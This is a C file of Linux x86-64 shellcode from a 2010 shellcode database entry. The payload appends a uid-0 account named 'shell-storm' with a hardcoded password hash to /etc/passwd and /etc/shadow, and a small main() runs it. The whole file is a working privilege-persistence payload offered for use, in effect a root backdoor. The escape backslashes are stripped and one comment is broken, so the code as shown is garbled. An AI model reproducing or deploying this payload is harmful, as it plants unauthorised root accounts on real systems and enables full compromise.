/*
Title: Linux/x86-64 - Add root user with password - 390 bytes
Date: 2010-06-20
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
Add root user with password:
- User: shell-storm
- Pass: leet
- id : 0
*/
#include <stdio.h>
char *SC =
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
"x48xbbxffxffxffxffxffx73x77x64" /* mov $0x647773ffffffffff,%rbx */
"x48xc1xebx28" /* shr $0x28,%rbx */
"x53" /* push %rbx */
"x48xbbx2fx65x74x63x2fx70x61x73" /* mov $0x7361702f6374652f,%rbx */
"x53" /* push %rbx */
"x48x89xe7" /* mov %rsp,%rdi */
"x66xbex41x04" /* mov $0x441,%si */
"x66xbax84x02" /* mov $0x284,%dx */
"x48x31xc0" /* xor %rax,%rax */
"xb0x02" /* mov $0x2,%al */
"x0fx05" /* syscall */
/* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
"x48xbfxffxffxffxffxffxffxffx03" /* mov $0x3ffffffffffffff,%rdi */
"x48xc1xefx38" /* shr $0x38,%rdi */
"x48xbbxffxffx2fx62x61x73x68x0a" /* mov $0xa687361622fffff,%rbx */
"x48xc1xebx10" /* shr $0x10,%rbx */
"x53" /* push %rbx */
"x48xbbx67x3ax2fx3ax2fx62x69x6e" /* mov $0x6e69622f3a2f3a67,%rbx */
"x53" /* push %rbx */
"x48xbbx73x74x6fx72x6dx2ex6fx72" /* mov $0x726f2e6d726f7473,%rbx */
"x53" /* push %rbx */
"x48xbbx30x3ax73x68x65x6cx6cx2d" /* mov $0x2d6c6c6568733a30,%rbx */
"x53" /* push %rbx */
"x48xbbx6fx72x6dx3ax78x3ax30x3a" /* mov $0x3a303a783a6d726f,%rbx */
"x53" /* push %rbx */
"x48xbbx73x68x65x6cx6cx2dx73x74" /* mov $0x74732d6c6c656873,%rbx */
"x53" /* push %rbx */
"x48x89xe6" /* mov %rsp,%rsi */
"x48xbaxffxffxffxffxffxffxffx2e" /* mov $0x2effffffffffffff,%rdx */
"x48xc1xeax38" /* shr $0x38,%rdx */
"x48x31xc0" /* xor %rax,%rax */
"xb0x01" /* mov $0x1,%al */
"x0fx05" /* syscall */
/* close(3) */
"x48xbfxffxffxffxffxffxffxffx03" /* mov $0x3ffffffffffffff,%rdi */
"x48xc1xefx38" /* shr $0x38,%rdi */
"x48x31xc0" /* xor %rax,%rax */
"xb0x03" /* mov $0x3,%al */
"x0fx05" /* syscall */
/* Xor */
"x48x31xdb" /* xor %rbx,%rbx */
"x48x31xff" /* xor %rdi,%rdi */
"x48x31xf6" /* xor %rsi,%rsi */
"x48x31xd2" /* xor %rdx,%rdx */
/* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */
"x48xbbxffxffxffxffxffx64x6fx77" /* mov $0x776f64ffffffffff,%rbx */
"x48xc1xebx28" /* shr $0x28,%rbx */
"x53" /* push %rbx */
"x48xbbx2fx65x74x63x2fx73x68x61" /* mov $0x6168732f6374652f,%rbx */
"x53" /* push %rbx */
"x48x89xe7" /* mov %rsp,%rdi */
"x66xbex41x04" /* mov $0x441,%si */
"x66xbax84x02" /* mov $0x284,%dx */
"x48x31xc0" /* xor %rax,%rax */
"xb0x02" /* mov $0x2,%al */
"x0fx05" /* syscall *
/* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
"x48xbfxffxffxffxffxffxffxffx03" /* mov $0x3ffffffffffffff,%rdi */
"x48xc1xefx38" /* shr $0x38,%rdi */
"x48xbbxffxffxffxffxffx3ax3ax0a" /* mov $0xa3a3affffffffff,%rbx */
"x48xc1xebx28" /* shr $0x28,%rbx */
"x53" /* push %rbx */
"x48xbbx34x37x37x38x3ax3ax3ax3a" /* mov $0x3a3a3a3a38373734,%rbx */
"x53" /* push %rbx */
"x48xbbx5ax30x55x33x4dx2fx3ax31" /* mov $0x313a2f4d3355305a,%rbx */
"x53" /* push %rbx */
"x48xbbx73x2fx50x64x53x67x63x46" /* mov $0x4663675364502f73,%rbx */
"x53" /* push %rbx */
"x48xbbx61x78x65x4dx67x36x4cx54" /* mov $0x544c36674d657861,%rbx */
"x53" /* push %rbx */
"x48xbbx65x57x45x37x47x4dx31x24" /* mov $0x24314d4737455765,%rbx */
"x53" /* push %rbx */
"x48xbbx6fx72x6dx3ax24x31x24x72" /* mov $0x722431243a6d726f,%rbx */
"x53" /* push %rbx */
"x48xbbx73x68x65x6cx6cx2dx73x74" /* mov $0x74732d6c6c656873,%rbx */
"x53" /* push %rbx */
"x48x89xe6" /* mov %rsp,%rsi */
"x48xbaxffxffxffxffxffxffxffx3b" /* mov $0x3bffffffffffffff,%rdx */
"x48xc1xeax38" /* shr $0x38,%rdx */
"x48x31xc0" /* xor %rax,%rax */
"xb0x01" /* mov $0x1,%al */
"x0fx05" /* syscall */
/* close(3) */
"x48xbfxffxffxffxffxffxffxffx03" /* mov $0x3ffffffffffffff,%rdi */
"x48xc1xefx38" /* shr $0x38,%rdi */
"x48x31xc0" /* xor %rax,%rax */
"xb0x03" /* mov $0x3,%al */
"x0fx05" /* syscall */
/* _exit(0) */
"x48x31xff" /* xor %rdi,%rdi */
"x48x31xc0" /* xor %rax,%rax */
"xb0x3c" /* mov $0x3c,%al */
"x0fx05"; /* syscall */
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}